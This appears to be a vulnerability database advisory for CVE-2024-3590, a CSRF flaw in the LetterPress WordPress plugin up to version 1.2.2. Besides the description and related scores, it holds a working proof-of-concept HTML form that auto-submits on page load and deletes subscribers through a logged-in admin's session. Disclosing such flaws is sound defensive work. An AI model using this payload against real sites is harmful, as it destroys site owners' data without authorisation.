Lucene search
Bob MatyasWPEX-ID:829F4D40-E5B0-4009-B753-85CA2A5B3D25HistoryApr 18, 2024 - 12:00 a.m.
LetterPress <= 1.2.2 - Subscriber Deletion via CSRF
2024-04-1800:00:00
Bob Matyas
24
letterpress
csrf
subscriber deletion
poc
exploit
security
Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks, such as delete arbitrary subscribers
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=letterpress-subscribers" method="POST">
<input type="text" name="subscriber[]" value="1" />
<input type="text" name="action" value="delete" />
<input type="text" name="action2" value="delete" />
<input type="submit" value="submit">
</form>
</body>
```Related
wpvulndb
wpvulndb
LetterPress <= 1.2.2 - Subscriber Deletion via CSRF
2024-04-18 00:00:00
cve
cve
CVE-2024-3590
2024-05-14 15:41:54
nvd
nvd
CVE-2024-3590
2024-05-14 15:41:54
cvelist
cvelist
CVE-2024-3590 LetterPress <= 1.2.2 - Subscriber Deletion via CSRF
2024-05-09 06:00:02
wordfence
wordfence
6.9 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:829F4D40-E5B0-4009-B753-85CA2A5B3D25